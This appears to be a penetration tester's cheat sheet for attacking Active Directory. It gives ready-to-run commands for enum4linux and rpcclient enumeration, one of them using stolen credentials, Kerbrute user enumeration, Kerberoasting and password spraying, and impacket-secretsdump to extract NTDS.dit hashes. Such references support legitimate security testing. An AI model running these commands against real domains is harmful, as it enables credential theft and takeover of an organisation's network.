Active Directory
Attack Workflow
Determine what ports are open
Enumerate with
Enumerate AD information
Domain info
rpcclient
enum4linux
Get list of users
If list not available, bruteforce usernames
Determine if kerberos pre-auth exists
Determine which users have SPNs (Service Principle Names)
enum4linux
Used to enumerate a huge amount of AD information from the command line.
enum4linux -a 10.1.1.10 # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U 10.1.1.10 # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10 # Attempt to gather SMB shares
rpcclient
Used to enumerate information about system over RPC
Gather a list of accounts with rpcclient
and save
rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt
Password Spraying
Using a tool such as Talon can run password spray attacks across an AD env
Kerberos
Kerbrute, used to run various kerberos attacks. Written in Go. https://github.com/ropnop/kerbrute
./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt
Kerberoasting
Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have a SPN (Service Principle Name), then request RC4 tickets from the DC.
secretsdump
Used to extract hashes from a server. Below command will get NTDS.dit, assuming that you have an account with those permissions.
impacket-secretsdump -just-dc backup:[email protected]

https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
Last updated
Was this helpful?